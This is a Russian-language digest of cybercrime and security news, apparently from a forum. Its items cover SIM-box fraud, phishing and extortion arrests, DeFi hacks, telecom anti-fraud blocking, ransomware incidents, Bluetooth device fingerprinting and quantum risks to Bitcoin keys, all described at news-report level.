Безработный и предприниматель из Хмельницкой области организовали подпольный «центр коммутации международной связи». Для этого использовалось оборудование, которое позволяло осуществлять международные звонки под видом местных.
Международный телефонный трафик перенаправляли во внутреннюю телекоммуникационную сеть мобильных операторов. В результате международные звонки тарифицировались по ценам национальным.
К тому же киберзлодеи гарантировали своим клиентам полную анонимность при зарубежных звонках. Поэтому пользователями их «услуг» были в основном телефонные мошенники, коллекторские союзы, разного рода колцентры.
Также создавались условия для деятельности так называемых ботоферм: регистрации и анонимизации личности в социальных сетях, мессенджерах, досках объявлений и других онлайн сервисах.
Установлено, что услуги предоставлялись представителям РФ. Их оплату осуществляли через электронные кошельки санкционных платежных систем.
По данным следствия, организаторы схемы использовали сим-карты операторов мобильной связи Украины и СНГ.
Специализированные аппаратно-программные комплексы злоумышленники разместили в собственных домах и в арендованных помещениях в Украине и за рубежом.
В ходе проведенных в ходе следствия обысков по месту жительства организаторов схемы обнаружены и изъяты:
- компьютерную технику с установленным специализированным программным обеспечением;
- пять sim-банков на 128 каналов;
- шесть sim-банков на 32 канала;
- GoIP шлюзы и антенны, 3G модемы;
- более 2,8 тысячи сим-карт операторов связи, в том числе РФ.
В рамках уголовного производства, начатого по ч. 2 ст. 361 (несанкционированное вмешательство в работу электронно-вычислительных машин (компьютеров), автоматизированных систем, компьютерных сетей или сетей электросвязи) Уголовного кодекса Украины, продолжается досудебное следствие. Устанавливаются все лица, причастные к противоправной деятельности.
Мероприятия по разоблачению злоумышленников проводил Департамент контрразведывательной защиты интересов государства в сфере информационной безопасности совместно с УСБУ в Хмельницкой области и со специалистами отдела противодействия киберпреступлениям в Хмельницкой области, следственным подразделением Нацполиции при процессуальном руководстве областной прокуратуры.
Фрунзенским (г. Минска) районным отделом Следственного комитета Республики Беларусь расследуется уголовное дело по факту изготовления и сбыта поддельных платежных средств 36-летним гражданином Российской Федерации.
Так, 26 августа 2021 года с помощью оперативно-розыскных мероприятий сотрудниками милиции установлен и задержан россиянин, который посредством фишинговой ссылки незаконно завладевал и распространял реквизиты банковских платежных карт граждан, а также их аунтефикационные данные.
Мужчина около трех лет назад создал веб-сайт, на котором посетителям предлагалось приобрести материалы порнографического характера. Ресурс содержал в себе ссылку для перехода на файлообменник, на котором был размещен файл с вредоносным программным обеспечением. Пользователь, который переходил и скачивал данный файл, автоматически получал сообщение на рабочий экран: «Если Вы не осуществите покупку подарочной карты стоимостью 500 долларов США, вся информация, хранящаяся на компьютере, предастся огласке среди знакомых и друзей, а также правоохранительным органам». После чего фигурант получал денежные средства.
Через год сайт заблокировали, но легкий способ заработка денег настолько привлек мужчину, что тот создал новый. С января 2021 года россиянин придумал схему незаконного получения прибыли: он создал форум, на котором после регистрации пользователям предлагалось получить доступ к большой коллекции порнографического материала. Гражданам требовалось вводить реквизиты банковских карт, а когда посетитель сайта перенаправлялся на страницу с бесконечной загрузкой, деньги с карты исчезали бесследно.
Похищались не только деньги, но сами реквизиты платежных карт, и все по той же схеме, после того как пользователь совершал покупку и указывал данные своей карты, осуществлялся сбор реквизитов с целью дальнейшей продажи. От действий «хакера» пострадали не только наши граждане, но и граждане иностранных государств.
Следователи изучили личность обвиняемого – он уже ранее был судим за аналогичное преступление на территории Российской Федерации, кроме этого, фигурант не имел вида на жительство в Республике Беларусь. В настоящее время проводятся следственные и процессуальные действия, направленные на установление иных лиц, причастных к данному преступлению.
Действия обвиняемого квалифицированы следствием по ч. 1 ст. 222 (незаконный оборот средств платежа) Уголовного кодекса Республики Беларусь. К обвиняемому применена мера пресечения в виде заключения под стражу.
• Source: sk.gov.by/ru/news-usk-gminsk-ru/view/kompjjuternyj-genij-zakluchen- pod-strazhu-muzhchina-poxischavshij-dengi-s-kart-grazhdan-10528/
• Video:
Разработчики Tornado Cash, самого популярного миксера транзакций Ethereum, развернули смарт-контракт в сети второго уровня Arbitrum. Этот шаг открывает для инвесторов DeFi-платформ возможность проводить не отслеживаемые инвестиции или анонимизировать распределение полученной прибыли.
Смарт-контракты полностью децентрализованы, защищены от обновления или вероятной остановки, а пользовательский интерфейс реализован на IPFS.
Анонимность достигается за счет отправки депозита в адрес Tornado Cash с одновременной генерацией случайного ключа. Он позволяет снять депозит на любой «чистый» адрес. Общее накопление смарт-контрактом Tornado Cash всех перечисленных депозитов, делает практически невозможным отслеживание связей между ETH-адресами.
Хакеры используют этот смарт-контракт практически во всех случаях взлома DeFi- платформ блокчейна Ethereum. Большинство из них сейчас перешло в сеть Arbitrum с целью привлечения инвесторов возможностью сэкономить на комиссиях. Транзакции на сайдчейне обходятся в $2,81, что гораздо ниже услуг майнеров Ethereum, которые в среднем обходятся по $40.
Разработчики проекта DeFi Tinyman сообщили, что хакеры воспользовались ранее неизвестной уязвимостью в смарт-контракте, предназначенном для сжигания токенов, и вывели криптоактивы на $3 млн.
Согласно сообщению в блоге проекта, хакеры создали и активировали адреса кошельков, после чего внесли пробный депозит для последующего взлома протокола. Затем злоумышленники провели транзакции с целевыми пулами, обменяли часть своих средств на получение идентификатора ASA: 386192725 (gobtc) и создали несколько токенов пула
После этого киберпреступники использовали ранее неизвестную уязвимость в смарт-контракте, предназначенном для сжигания токенов. Хакеры провели более 17 транзакций с пулами gobtc и goeth (ASA ID: 386195940), что привело к снижению стоимости актива. Чтобы увеличить прибыль и перевести деньги на кошельки централизованных бирж, хакеры провели конвертацию токенов в стейблкоины.
Таким образом киберпреступники вывели криптоактивы на $3 млн. Разработчики Tinyman предупредили, что смарт-контракты, которые использовали преступники, не имеют ограничений и их выполнение не может быть остановлено. Поэтому команда проекта призывает пользователей вывести активы с кошельков, которые могут попасть под воздействие скомпрометированных смарт-контрактов.
Создание новых депозитов на платформе приостановлено до полного прояснения ситуации. Команда проекта сообщила, что обратилась в правоохранительные органы и в компании по кибербезопасности за помощью в выявлении лиц, причастных ко взлому. Tinyman будет сообщать своим пользователям о ходе восстановления работоспособности и безопасности протокола.
• Source: <https://tinymanorg.medium.com/official-announcement-about-the- incidents-of-01-01-2022-56abb19d8b19>
При процессуальном руководстве прокуроров Левобережной окружной прокуратуры города Днепра пятерым участникам преступной группы сообщено о подозрении по фактам кражи, мошенничества и несанкционированного вмешательства в работу информационных автоматизированных систем (ч. 4 ст. 185, ч. 4 ст. 190, ч. 2 ст. 361 УК Украины).
По данным следствия, подозреваемые, привлекая работника бюро судебно- медицинской экспертизы, на территории морга похищали SIM-карты и мобильные телефоны погибших украинских военных.
Среди участников группы был ИТ-шник. Он менял пароли и получал полный доступ к онлайн-банкингу павших воинов.
В дальнейшем подозреваемые снимали наличные, оформляли кредиты на имена погибших и переводили деньги на собственные счета.
Сейчас установлено 20 пострадавших, сумма нанесенного ущерба - почти 1,5 млн грн.
Во время обысков изъяты мобильные телефоны, компьютерная техника, SIM-карты, военная одежда и экипировка, черновые записи.
Сейчас всем участникам группы избраны меры пресечения в виде содержания под стражей.
Спецоперация по разоблачению проведена совместно со следователями Днепровского райуправления полиции области при оперативном сопровождении сотрудников Управления противодействия киберпреступлениям в области и Департамента кибербезопасности СБУ.
gp.gov.ua/ua/posts/vikrali-maize-15-mln-grn-z-raxunkiv-zagiblix-ukrayinskix- viiskovix-u-dnipri-zatrimano-cleniv-zlocinnoyi-grupi
Французская полиция закрыла сервис Coco.gg, использовавшийся преступниками для координации сексуализированных и других тяжких преступлений.
Расследование деятельности сайта Coco началось в декабре 2023 года. Французские правоохранительные органы работали в сотрудничестве с коллегами из Болгарии, Германии, Литвы, Нидерландов и Венгрии. По данным французской газеты Le Figaro, сервера сайта были конфискованы в Германии, оператор сайта, гражданин Франции, арестован в Болгарии, а его жена задержана во Франции.
Сайт Coco получил в обществе прозвище «логово хищников». Ранее деятельность сайта вызывала серьёзные опасения у правозащитных организаций, активистов и ассоциаций по защите детей. Правозащитники ещё в прошлом году призывали закрыть сайт, так как на нём собирались преступники для организации нападений на представителей нетрадиционной сексуальной ориентации. Например, одно из избиений было совершено пятью пользователями Coco.
Несколько ассоциаций по защите детей, включая Innocence in Danger, с 2013 года ведут кампанию против сайта. Отмечается, что сайт представляет серьёзную опасность, так как любой пользователь мог получить доступ без каких-либо фильтров и модерации. К 2023 году Coco посетило как минимум 850 000 пользователей во Франции.
Сайт Coco позиционировал себя как «чат без регистрации», требуя от пользователей указать только пол, возраст, почтовый индекс и никнейм. Такой низкий порог входа стал одной из причин популярности Coco среди киберпреступников.
Сайт Coco принадлежал болгарской компании, а его домен (.gg) базировался на Англо-нормандском острове Гернси. Отмечается также что, ранее сайт контролировался другими организациями.
За последние 3 года французская полиция инициировала более 23 000 судебных разбирательств, связанных с платформой Coco. Случаи, касающиеся платформы, зафиксированы в 70 отделах прокуратуры по всей Франции, пострадавшими стали 480 человек.
Закрытие сайта Coco.gg — долгожданная победа для многих организаций и активистов, которые долгие годы боролись за безопасность в интернете. Прецедент с Coco станет уроком для других платформ, позволяющих преступникам действовать безнаказанно.
Оперативники отдела по борьбе с киберпреступностью Главного управления МВД России по Иркутской области во взаимодействии с коллегами из Новосибирской области пресекли деятельность межрегиональной вебкам-студии, распространявшей порнографические материалы в России и за рубежом.
Как установили полицейские, 34-летний житель Новосибирской области создал несколько точек по производству запрещённого контента в разных регионах страны. Они располагались в квартирах и были оснащены необходимой электронной техникой.
Одна из студий находилась в столице Восточной Сибири. Здесь «трудились» 3 модели в возрасте от 19 до 40 лет. Преимущественно трансляции осуществлялись в вечернее время.
В ходе обысковых мероприятий в самой студии, а также по местам жительства женщин полицейские обнаружили и изъяли компьютерную технику, мобильные телефоны, банковские карты, а также бесствольный пистолет «Оса».
В настоящее время следователем следственного отдела № 5 Межмуниципального управления МВД России «Иркутское» возбуждены уголовные дела по части 3 статьи 242 Уголовного кодекса Российской Федерации. Организатор заключён под стражу.
Сотрудники УБК ГУ МВД России по г. Санкт-Петербургу и Ленинградской области задержали приезжего из города Пензы. Он подозревается в мошенничестве, совершенном с использованием интернет-технологий.
«Предварительно установлено, что злоумышленник вел противоправную деятельность с 2022 года. С помощью специального программного обеспечения он получал неправомерный доступ к малоактивным и брошенным интернет-аккаунтам работников сервисов доставок. Для получения заказов по транспортировке товаров фигурант имитировал высокую активность и оставлял положительные отзывы. В результате программный алгоритм присваивал его аккаунтам повышенный рейтинг доверия.
Аферист принимал только те заказы, которые предполагали доставку дорогостоящих покупок с оплатой наличными. Он привозил товар из магазина покупателю, а полученные деньги присваивал. Затем отправлял в торговую организацию поддельные чеки о переводе средств на ее счет. В результате продавцам была вынуждена платить сервисная служба. А фигурант менял аккаунт, телефон, сим- карту и продолжал свой криминальный бизнес. Когда служба доставки начала принимать ограничительные меры, он стал подыскивать сообщников. Они за вознаграждение регистрировали на свое имя новые аккаунты курьеров и предоставляли к ним доступ», – рассказала официальный представитель МВД России Ирина Волк.
При передаче товара покупателю аферист скрывал лицо с помощью медицинских масок, шарфов и головных уборов. Несмотря на эти меры, полицейские установили его личность и задержали. В ходе проведенного личного досмотра у подозреваемого изъято 17 сим-карт, три мобильных телефона, планшет, мобильный роутер, а также денежные средства и товары, взятые для доставки.
«Следователями территориальных органов внутренних дел в Калининском, Красносельском, Выборгском, Невском и Адмиралтейском районах Санкт-Петербурга возбуждено 12 уголовных дел по признакам преступлений, предусмотренных статьей 159 УК РФ.
В отношении фигуранта избрана мера пресечения в виде заключения под стражу. Устанавливаются все эпизоды противоправной деятельности», – сообщила Ирина Волк.
Около торгового центра на Хорошевском шоссе в Москве сотрудники отдела МВД России по Хорошевскому району во время проведения профилактического мероприятия обратили внимание на взволнованного пожилого мужчину, который держал в руках пакет, разговаривал с кем-то по телефону и, озираясь по сторонам, направлялся во двор ближайшего дома.
Предположив, что пенсионер общается с телефонными мошенниками, которые выманивают у него денежные средства, полицейские проследовали за ним, чтобы пресечь возможное преступление. Возле одной из многоэтажек он передал свой пакет подошедшей к нему девушке, после чего стражи правопорядка подошли к гражданам, выяснили их личности, а также поинтересовались содержимым свёртка – в нём находилось более 4,5 млн рублей.
В ходе беседы сотрудники полиции поняли, что 69-летний житель Подмосковья был обманут телефонными мошенниками. На протяжении двух месяцев ему звонили аферисты, представлявшиеся то правоохранителями, то работниками банка. В результате длительного обмана злоумышленники убедили пенсионера продать свою квартиру в Московской области, а затем пойти на встречу с их представительницей, чтобы отдать ей вырученные деньги. Всё это необходимо было сделать якобы с целью оказания помощи в поимке некоего преступника.
Полицейские задержали 24-летнюю жительницу другого региона страны, которая забрала пакет с наличностью, и доставили её в отдел МВД России по Хорошевскому району г. Москвы, где она была допрошена в качестве подозреваемой по уголовному делу, возбуждённому по ч. 3 ст. 30, ч. 4 ст. 159 Уголовного кодекса Российской Федерации. Стражи правопорядка изъяли у фигурантки денежные средства для дальнейшего возврата потерпевшему. Расследование продолжается.
Тысячи звонков на горячую линию привели к разоблачению преступной схемы.
Министерство иностранных дел Индии объявило об освобождении около 250 индийских граждан, которые были обманом вовлечены в мошеннические интернет- схемы в Камбодже. Освободительная операция стала возможной благодаря тесному сотрудничеству с камбоджийскими властями. 75 из 250 освобождённых уже успели вернуться в Индию.
По данным министерства, преступные агенты, часто связанные с компаниями из Китая, на постоянной основе вербуют жителей Южной и Юго-Восточной Азии под предлогом работы в сфере информационных технологий. Однако на деле эти люди оказываются вовлечены в работу на центры кибермошенничества, где у них отнимают документы, удерживают силой и заставляют осуществлять обманные операции в Интернете и по телефону.
В заявлении Министерства иностранных дел отмечается, что посольство Индии в Камбодже активно реагирует на жалобы граждан, попавших в подобные ситуации. Власти Индии также сотрудничают с камбоджийской стороной и местными правоохранительными органами для пресечения деятельности организаторов мошеннических схем.
В начале года Центр координации борьбы с киберпреступностью Индии (I4C) и Министерство внутренних дел сообщили, что около половины из 5000 звонков, поступающих ежедневно на горячую линию по вопросам киберпреступности, связаны с мошенничеством, осуществляемым компаниями из Камбоджи и Мьянмы, связанными в основном с китайскими приложениями.
Министерство иностранных дел и посольство Индии выпустили несколько предупреждений для соискателей работы, советуя им избегать предложений от сомнительных агентов и обращаться только к лицам, аккредитованным Министерством иностранных дел.
Полиция в нескольких индийских штатах, включая Одишу, Пенджаб и Кералу, уже провела аресты в связи с подобными делами. Власти признают, что жертв может быть гораздо больше, но основное внимание уделяется тем, кто обратился за помощью в посольства Индии за рубежом и тем, кого удалось освободить благодаря усилиям местных правоохранительных органов.
В прошлом месяце мы уже писали об аналогичной освободительной операции, проведённой полицией Филиппин. Тогда правоохранителям удалось освободить 875 операторов мошеннической сети, насильно удерживаемых преступниками на большой арендуемой площади. Жертвы преступной деятельности содержались в рабских условиях: за отказ от работы их наказывали физически, лишая еды и сна, а самых буйных и вовсе пытали с помощью электрошокера, чтобы сломить их дух и характер.
sc: thehindu.com/news/national/250-indians-forced-to-do-illegal-work-in- cambodia-rescued-and-repatriated-ministry-of-external- affairs/article68009920.ece
Участники рынка сообщили, что «Ростелеком» стал блокировать SIP-транки с IP- адресов российских хостинг-провайдеров, использующихся для анонимизации. Это делается во исполнение требований ФСБ по борьбе с телефонным мошенничеством, но эксперты опасаются, что этот инструмент может использоваться и для конкурентной борьбы.
«Ростелеком» блокирует SIP-транки с IP-адресов с анонимизацией
«Ростелеком» с 13 марта 2024 г. начал блокировать пользователей услуги «Виртуальная АТС», зарегистрированных на IP-адресах российских хостинг- провайдеров, которые используются для анонимизации. Об этом говорится в сообщении хостинг-провайдера FirstVDS, размещенного на площадке «Хабрахабр».
Из сообщения FirstVDS следует, что «Ростелеком» объяснил свои действия требованиями Федеральной службы безопасности (ФСБ) в части «антифрод-политики» (борьба с подменой телефонных номеров и другим мошенничеством в сетях связи). Якобы «Ростелеком» готов обсуждать в индивидуальном порядке открытие доступа для отдельных IP-адресов, но при условии согласования «с соответствующим службами».
FirstVDS констатирует, что в результате пользователи хостинг-провайдера, использующих сервисы для IP-телефонии с транками от «Ростелекома», столкнулись с блокировкой SIP-трафика. Якобы проблема коснулась и других хостинг- провайдеров. Смена IP-адреса на адреса из другого диапазона может помочь лишь временно решить проблему. Компания находится в контакте по данному вопросу с представителями Минцифры и ФСБ, но решение проблемы может занять до нескольких недель.
Представители «Ростелекома» отказались от комментариев. ФСБ к моменту публикации не ответила на вопрос CNews по данной теме.
Для чего используются SIP-транки и кто может быть пострадавшим
SIP – это протокол передачи данных, описывающий способ установления и завершения пользовательского сеанса связи. Используется, в том числе, для IP- телефонии. SIP-транк – виртуальный канал связи, который устанавливается между инфраструктурой клиента и провайдера и позволяющий обрабатывать одновременно более одного вызова.
SIP-транк используется для подключения к сети «Ростелекома» небольших операторов связи и крупных компаний, имеющих собственные АТС и номерную емкость, объясняет гендиректор аналитического агентства «Рустелеком» Юрий Брюквин. Благодаря этой услуге клиенты получают выход на телефонную сеть «Ростелекома», а через нее – и на другие сети.
Блокирование подозрительного SIP-трафика необходимо для борьбы с телефонным мошенничеством, включая печально знаменитые украинские колл-центры, полагает Брюквин. Кроме того, такие меры должны помочь борьбе с биржами телефонного трафика, продающими возможность приземления звонков в России кратно ниже их официальной стоимости.
При этом большинство клиентов не пострадают, уверен Брюквин: «Ростелеком» блокирует только тех клиентов, которых не удается идентифицировать. Проблемы могут быть у колл-центров, использующих упомянутую схему, но у них, как правило, есть подключение сразу к нескольким операторам связи.
Угроза передела рынка
Источник CNews на телекоммуникационном рынке поясняет, что проблема касается не только «Ростелекома», но и других операторов связи. «Это инициатива ФСБ и крупных операторов связи, которые под видом борьбы с фродом «прощупывают» рынок, - говорит собеседник издания. - При этом соответствующих изменений в законодательство не было внесено, и под видом борьбы с фродом некоторые операторы могут решить коммерческие задачи – не пускать на свои сети конкурентов. Возможно, изменения в законодательстве будут внесены после президентских выборов».
Как в России борются с телефонным мошенничеством
Для борьбы с телефонным мошенничеством Роскомнадзор создал систему «Антифрод», которая позволяет операторам связи проверять подлинность телефонного номера вызываемого абонента. Затраты федерального бюджета на ее создание составляют 1,5 млрд руб.
В 2023 г. к данной системы подключились 549 операторов связи, чья общая номерная емкость составила 85,8%. Всего за 2023 г. система «Антифрод» проверила 102,4 млрд руб. звонков, из которых 756,7 млн руб. были предотвращены как мошеннические. Но для полноценного решения проблемы все телефонные операторы должны подключить к системе «Антифрод», считают в Роскомнадзоре.
Блогер Виктория Логетскуя, известнуя также как «директор всех директоров», обвинили в мошенничестве на более чем 200 миллионов рублей. По данным канала, в числе тех, кто ей предъявляет претензии, бывшая супруга футболиста Мамаева Алана и бывший бойфренд Ольги Бузовой Денис Лебедев.
В октябре 2023 года они передали Логетской в общей сложности 5 млн рублей. Всего же блогер собрала с друзей и подруг сумму в 200 млн рублей. По словам пострадавших, Виктория обещала часть денег инвестировать, а часть — удачно поставить на бои, после чего вернуть с процентами. На какой срок ей отдавали деньги, не уточняется, однако через три месяца «инвесторы» забили тревогу. По информации канала, Логетская ответила им, что деньги находятся в обороте.
В итоге Алана Мамаева, как пишет Mash, уже подала иск на Логетскую. По информации канала, экс-бойфренд Бузовой тоже попал под подозрения, но сам Денис Лебедев утверждает, что он «наивный романтик», который стал жертвой Логетской и втянулся в махинации со ставками на бои.
Ранее заместитель руководителя комитета Госдумы по экономической политике Артем Кирьянов напомнил, что применение блогерами мошеннических схем для ухода от уплаты налогов обернется для них уголовной ответственностью. Он также подчеркнул, что в некоторых ситуациях будет недостаточно просто выплатить требуемую сумму.
На прошлой неделе, после выхода опциональных preview-обновлений для Windows, многие пользователи столкнулись с «синим экраном смерти» и ошибкой «UNSUPPORTED_PROCESSOR». Проблема коснулась Windows 10 21H2 и 22H2, а также Windows 11 22H2. Как теперь сообщили в MSI, это связано с материнскими платами компании.
BSOD возникает после установки KB5029351 (Windows 11) и KB5029331 (Windows 10), которые содержат исправления приложения Search и представляют новое приложение Backup для резервного копирования.
После массовых жалоб пользователей на ошибку ошибкой «UNSUPPORTED_PROCESSOR» представители Microsoft [сообщили](https://learn.microsoft.com/en-us/windows/release-health/status- windows-11-22h2#microsoft-received-reports-about-an--unsupported-processor-- error), что им уже известно о проблеме, возникающей после выпуска обновлений от 2 августа, и компания разбирается в причинах ее возникновения.
Тогда в компании отметили, что проблемные обновления «могут автоматически удаляться, чтобы Windows могла запускаться в штатном режиме». Вскоре эту информацию подтвердили пользователи, — опциональные обновления действительно «откатывались» после нескольких перезагрузок.
Также в Microsoft призвали людей, столкнувшихся с таким BSOD, использовать Feedback Hub и отправлять отчеты об ошибках, чтобы помочь быстрее решить проблему.
Как теперь [сообщают](https://www.msi.com/news/detail/MSI-On--UNSUPPORTED-
PROCESSOR--Error-Message-of-Windows-11-Update-KB5029351-Preview-142215) в
компании MSI, «синий экран смерти» оказался связан с некоторыми моделями ее
материнских плат.
«MSI получила ряд сообщений о том, что пользователи столкнулись с BSOD и сообщением об ошибке “UNSUPPORTED_PROCESSOR” на материнских платах MSI серий 600/700 после установки preview-обновления Windows 11 KB5029351, — заявляют в компании. — MSI и Microsoft знают об этой ошибке и уже начали расследование основной причины ее возникновения».
Click to expand...
Тайваньский производитель посоветовал всем пользователям Windows временно избегать установки preview-обновлений за август 2023 года в целом и KB5029351 в частности.
Тем, кто уже обновил свои системы и столкнулся с «синим экраном смерти», рекомендуют «откатить» BIOS к предыдущей версии и удалить дополнительные обновления. Компания уже опубликовала видео с подробными инструкциями о том, как сделать это с помощью M-FLASH
Источник: https://xakep.ru/2023/08/28/unsupported_processor/
Неизвестные зашифровали часть систем Электроэнергетической компании Ганы, на несколько дней оставив тысячи людей без света.
Хакеры нарушили работу Электроэнергетической компании Ганы (ECG), зашифровав часть систем с помощью вымогательского ПО. Эксперты ведут расследование, пытаясь выяснить как злоумышленники получили доступ к сетям EGC.
А пока компания полностью не восстановила работу, страдают независимые поставщики услуг и клиенты 10 операционных регионов ECG в Вольте, Кумаси, Аккре, Такоради, Теме, Кейп-Кост, Касоа, Виннебе, Сведру, Кофоридуа, Нкавкау и Тафо. Обычные люди остались без света на несколько дней, просто не имея возможности оплатить счета за электроэнергию.
Генеральный менеджер по внешним коммуникациям в ECG заявил, что компания уже стабилизировала работу некоторых районных отделений, которые уже начали принимать платежи от потребителей. А вот независимым поставщикам придется подождать – для них системы все еще нестабильны.
Должностные лица Национальной безопасности и Управления кибербезопасности сейчас проводят расследование совместно с ECG для восстановления систем и оценки ущерба.
**Why Krebs on security doxed him and why he requested to be sent to us?
https://krebsonsecurity[.]com/2022/...tmaster-arrested-requests-extradition- to-u-s/
**
Группа исследователей из Калифорнийского университета в Сан-Диего разработала метод идентификации мобильных устройств по beacon-сигналам, отправляемым в эфир при использовании Bluetooth Low Energy (BLE) и применяемым пассивными Bluetooth-приёмниками для определения появления новых устройств в пределах досягаемости.
В зависимости от реализации beacon-сигналы отправляются c частотой примерно 500 раз в минуту и по задумке создателей стандарта полностью обезличены и не могут использоваться для привязки к пользователю. В реальности ситуация оказалась иной и при отправке сигнал искажается под влиянием особенностей, возникающих в процессе производства каждого отдельного чипа. Данные искажения, которые для каждого устройства являются уникальными и постоянными, могут быть выявлены при помощи типовых программируемых приёмопередатчиков (SDR, Software Defined Radio).
Подробнее:
__
Bluetooth ](https://www.opennet.ru/opennews/art.shtml?num=57329)
www.opennet.ru
Ссылка на доп. источник (telegram):

Рандомизация MAC-адресов не спасает от отслеживания🤔 Группа исследователей из Калифорнийского университета в Сан-Диего разработала метод идентификации мобильных устройств по beacon-сигналам, отправляемым в эфир при использовании Bluetooth. В зависимости от реализации beacon-сигналы...
t.me
Специалисты Vedere Labs ИБ-компании Forescout Technologies представили новую PoC-атаку с использованием вымогательского ПО на IoT- и OT-оборудование.
По словам главы исследовательского отдела Vedere Labs Даниэля дос Сантоса (Daniel dos Santos), это «первая и единственная в настоящее время работа, совмещающая миры IT, OT и вымогательского ПО для IoT».
Атака заключается в следующем: с помощью IP-камеры гипотетический хакер взламывает IT-инфраструктуру организации и использует полученный доступ для отключения операционно-технологического (OT) оборудования. В атаке эксплуатируются существующие известные уязвимости, и новые эксплоиты не предусмотрены.
В ходе атаки злоумышленник взламывает подключенные к сети камеры видеонаблюдения, в частности от Axis и Hikvision. По данным Forescout на этих двух вендоров приходится 77% от всех IP-камер в корпоративных сетях. Кроме того, более полумиллиона устройств используют заводскую конфигурацию VLAN 1, то есть, камеры не настроены должным образом с учетом сегментации сети.
Исследователи показали, как с помощью уязвимостей в камерах злоумышленники могут выполнять команды для получения доступа к Windows-машинам. Оттуда они могут выполнять дальнейшие команды для выявления дополнительных подключенных к камерам машин и машин с ненадежными учетными данными, открывать RDP-порты и прокладывать SSH-туннели.
Затем с помощью полученного доступа злоумышленники могут открывать RDP-сеанс, устанавливать вредоносное ПО и отключать межсетевые экраны и антивирусные решения. Доступ позволяет хакерам повышать свои привилегии, устанавливать вымогательское ПО и криптовалютные майнеры, а также запускать вредоносные исполняемые файлы, нацеленные на OT-системы.
В своем видео специалисты продемонстрировали симуляцию атаки вымогательского ПО на условную больницу. Исследователи получили доступ к IP-камере, а через нее – к сети больницы и выявили программируемый логический контроллер, использующийся для управления HVAC-системой больницы. Повысив свои привилегии, они установили вымогательское ПО и отключили HVAC.
Хотя смоделированная атака слишком специфична, чтобы ее можно было непосредственно применить к какой-либо одной организации, исследование Vedere Labs показывает, как через различные типы подключенного к сети оборудования злоумышленники могут причинить серьезный вред организациям.
• Source: <https://www.forescout.com/resources/r4iot-next-generation- ransomware-report/>
Сисадмин постоянно просыпал работу и менял данные в системе пропусков.
Сотрудник АО «Протон-ПМ» взломал систему электронных проходных и изменил время входа на предприятие. Это первый обвинительный приговор в Пермском крае по уголовной статье о воздействии на критическую инфраструктуру государства.
Системного администратора АО «Протон-ПМ» признали виновным в неправомерном воздействии на критическую информационную инфраструктуру Российской Федерации (ч. 1 ст. 274.1 УК РФ), а также использовании нелицензионных вредоносных программ (ч. 2 ст. 273 УК РФ). Суд назначил мужчине штраф в размере 200 тыс. рублей. Приговор вынесен 16 мая и в законную силу еще не вступил. сообщили журналисту Properm.ru в пресс-службе суда.
В марте прокуратура утвердила в отношении сотрудника АО «Протон-ПМ» обвинительное заключение. Из материалов дела следует, что мужчина неоднократно вносил изменения в данные электронных проходных. Сотрудниками службы безопасности предприятия было выявлено, что весной 2021 года он изменил время прибытия на работу в системе контроля управления и доступа на предприятии. Следствием не исключалось, что мужчина делал это не единожды.
В случае, когда сисадмин был «пойман за руку», если бы случай его опоздания на работу был зафиксирован, то он лишился бы премиальных в размере порядка 19 тыс. рублей.
АО «Протон-ПМ» занимается производством жидкостных ракетных двигателей РД - 275 для первой ступени ракеты-носителя тяжелого класса 'Протон' и его модификаций, узлов жидкостного ракетного двигателя РД-191 и др.
Журналисты Cointelegraph смогли получить интервью у белого хакера, который стоял за возвратом $25 млн DeFi-платформе StableMagnet. Код проекта был взломан в ходе июньской атаки прошлого года, исследователь объяснил, почему на поиск злоумышленников ушло так много времени.
Белый хакер ждал, пока кто-нибудь из них не «засветится» в юрисдикции развитых стран, где можно было бы привлечь к делу полицию.
Преследователь сказал в интервью об отсутствии цели посадить злоумышленников, но только угроза реального срока могла их заставить вернуть деньги. Белый хакер вышел на их личности и оставил просьбы связаться с ним, чтобы закрыть вопрос полным возвратом средств. Они отказались это сделать, но полученное сообщение напугало часть членов группировки, которые решили на время исчезнуть из родного Гонконга, укрывшись в Великобритании.
Это было большой ошибкой. Белый хакер к тому времени мониторил все соцсети их родственников и семей, через которые и узнал про планы переезда. Он самостоятельно вылетел в Великобританию, чтобы подать заявление в местную полицию, предоставив доказательства преступления.
Британские правоохранительные органы взяли преступников с поличным, конфисковав $9 млн. После этого случая, остальные члены группировки связались с Белым хакером и вернули средства StableMagnet.
Он намекнул Cointelegraph, что злоумышленников выдал стиль написания кода. Исследователь изучил его при разборе эксплойта, используемого при атаке на DeFi-платформу. Хакеры были найдены через GitHub, где они разместили ряд программ. Далее их аккаунты уже отслеживались на предмет связи с другими аккаунтами в соцсетях.
Осталось около пяти лет до того момента, когда коммерческие квантовые компьютеры смогут взломать ключи эллиптической кривой, обеспечивающие безопасность биткоин-кошельков. Такое мнение высказал ученый из Университета Калгари Пьер-Люк Даллер-Демерс в разговоре с [DLNews](https://www.dlnews.com/articles/defi/quantum-computers-5-years-from- breaking-bitcoin/).
Эксперт подразумевает шифрование ECDSA 256, которое защищает адреса и подписывает транзакции с помощью пар открытых и закрытых ключей.
«Взлом этих ключей — одно из самых простых применений для больших квантовых компьютеров», — подчеркнул он.
Click to expand...
ECDSA 256 уязвим для алгоритма Шора, который позволяет эффективно разлагать большие числа на простые множители и может взломать приватные ключи криптовалютных кошельков. Этот алгоритм представляет собой значительный прорыв в области квантовых вычислений, поскольку он решает задачу факторизации чисел за полиномиальное время, в то время как классические алгоритмы справляются с этой задачей за экспоненциальное время.
Другой алгоритм шифрования в сети биткоина SHA-256, позволяющий майнерам хэшировать и добавлять блоки в сеть через [Proof-of- Work](https://forklog.com/cryptorium/chto-takoe-proof-of-work-i-proof-of- stake), можно исправить путем удвоения длины хэша. Такое мнение выразили эксперты специализирующейся на цифровых активах фирмы Galaxy. Однако защита от алгоритма Шора требует фундаментальных изменений в криптографии биткоина.
Первыми от квантового компьютера пострадают кошельки ранних пользователей биткоина, включая [Сатоши Накамото](https://forklog.com/cryptorium/kto-takoj- satoshi-nakamoto). Они до сих пор используют ранний формат P2PK. Он полностью раскрывает открытый ключ, что дает злоумышленникам время для атаки методом перебора.
Современные адреса вроде P2PKH защищены лучше, поскольку публикуют только хеш ключа.
В связи с этим основатель и СЕО Ava Labs Эмин Гюн Сирер [предложил](https://forklog.com/news/v-soobshhestve-predlozhili-zamorozit- bitkoiny-satoshi) заморозить 1 млн BTC Сатоши Накамото.
Ранние пользователи биткоина могут избежать взлома путем перевода монет со старых адресов на недавно сгенерированные.
«Если у людей все еще есть монеты в P2PK-адресах, им следует немедленно переместить свои активы», — подчеркнул Даллер-Демерс.
Click to expand...
